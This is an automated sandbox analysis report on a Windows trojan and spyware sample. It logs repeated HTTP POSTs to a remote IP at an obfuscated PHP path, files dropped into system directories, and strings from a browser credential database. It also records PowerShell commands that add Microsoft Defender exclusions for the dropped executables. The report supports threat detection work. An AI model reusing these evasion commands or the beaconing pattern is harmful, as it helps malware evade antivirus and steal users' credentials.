                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 1876Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2592Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 1876Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 1876Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: 154.29.71.9 | Content-Length: 1856 | Expect: 100-continue | Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: 154.29.71.9 | Content-Length: 1876 | Expect: 100-continue | Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: 154.29.71.9 | Content-Length: 2596 | Expect: 100-continue | Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: 154.29.71.9 | Content-Length: 2596 | Expect: 100-continue
                            Source: global traffic | HTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: 154.29.71.9 | Content-Length: 1864 | Expect: 100-continue | Connection: Keep-Alive
                            Source: unknown | TCP traffic detected without corresponding DNS query: 154.29.71.9
                            Source: unknown | HTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: 154.29.71.9 | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
                            Source: powershell.exe, 00000018.00000002.3283628819.0000021BC69D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
                            Source: powershell.exe, 00000013.00000002.3295250062.000001A8F1EDD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoS
                            Source: svchost.exe, 0000002D.00000003.1868495517.000002A23E418000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.45.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                            Source: svchost.exe, 0000002D.00000003.1868495517.000002A23E418000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                            Source: qmgr.db.45.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                            Source: qmgr.db.45.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                            Source: qmgr.db.45.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                            Source: svchost.exe, 0000002D.00000003.1868495517.000002A23E418000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.45.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                            Source: qmgr.db.45.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                            Source: qmgr.db.45.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                            Source: powershell.exe, 00000013.00000002.2943449790.000001A890078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3049842773.000001B7555E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3016378248.0000021BBE617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3061501750.00000187239B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 0000001A.00000002.1856432912.0000018713B68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000013.00000002.1840605752.000001A880228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1864124040.000001B745799000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1855678251.0000022355749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1857025753.0000021BAE7C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1856432912.0000018713B68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, 00000000.00000002.1718805809.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1840605752.000001A880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1864124040.000001B745571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1855678251.0000022355521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1857025753.0000021BAE5A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1856432912.0000018713941000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000013.00000002.1840605752.000001A880228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1864124040.000001B745799000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1855678251.0000022355749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1857025753.0000021BAE7C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1856432912.0000018713B68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: powershell.exe, 0000001A.00000002.1856432912.0000018713B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 00000013.00000002.3273090808.000001A8F1E60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t.com/pk
                            Source: uKWmKdnjVI.42.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: powershell.exe, 00000013.00000002.1840605752.000001A880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1864124040.000001B745571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1855678251.0000022355521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1857025753.0000021BAE5A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1856432912.0000018713941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: uKWmKdnjVI.42.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: uKWmKdnjVI.42.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                            Source: uKWmKdnjVI.42.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                            Source: powershell.exe, 0000001A.00000002.3061501750.00000187239B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 0000001A.00000002.3061501750.00000187239B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 0000001A.00000002.3061501750.00000187239B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: uKWmKdnjVI.42.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: uKWmKdnjVI.42.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: uKWmKdnjVI.42.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: qmgr.db.45.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                            Source: svchost.exe, 0000002D.00000003.1868495517.000002A23E40E000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.45.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                            Source: qmgr.db.45.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                            Source: qmgr.db.45.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                            Source: powershell.exe, 0000001A.00000002.1856432912.0000018713B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 00000013.00000002.2943449790.000001A890078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3049842773.000001B7555E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3016378248.0000021BBE617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3061501750.00000187239B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: qmgr.db.45.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                            Source: uKWmKdnjVI.42.drString found in binary or memory: https://www.ecosia.org/newtab/
                            Source: uKWmKdnjVI.42.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWindow created: window name: CLIPBRDWNDCLASS
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe\:Zone.Identifier:$DATA
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Windows\Vss\Writers\Application\66bd154ce6dd3f
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC63445EDF6B1F4E2FAF4EDB3743FA6EFB.TMP
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC63445EDF6B1F4E2FAF4EDB3743FA6EFB.TMP
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AIflJiPS.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, 00000000.00000000.1655633091.0000000000132000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, 00000000.00000002.1800732292.000000001B967000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, 00000000.00000002.1718729884.0000000002732000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, 00000000.00000002.1717151916.0000000000A57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, AJRTsBVOnfdpTDlf5PX.csCryptographic APIs: 'CreateDecryptor'
                            Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@47/91@0/2
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\zNoaAjFw.log
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeMutant created: \Sessions\1\BaseNamedObjects\Local\9689fee2575b041d566fe4e90198abfbc11de5c33209f1394c6288edd57e1bda
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\AppData\Local\Temp\od53iwxz
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\B7heSupDrt.bat"
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile read: C:\Users\desktop.ini
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: 0zDW1acYVi.42.dr, cBi7y8wmkT.42.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeVirustotal: Detection: 60%
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeReversingLabs: Detection: 76%
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile read: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                            Source: unknownProcess created: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe "C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe"
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DC7.tmp" "c:\Windows\System32\CSC63445EDF6B1F4E2FAF4EDB3743FA6EFB.TMP"
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe'
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\services.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
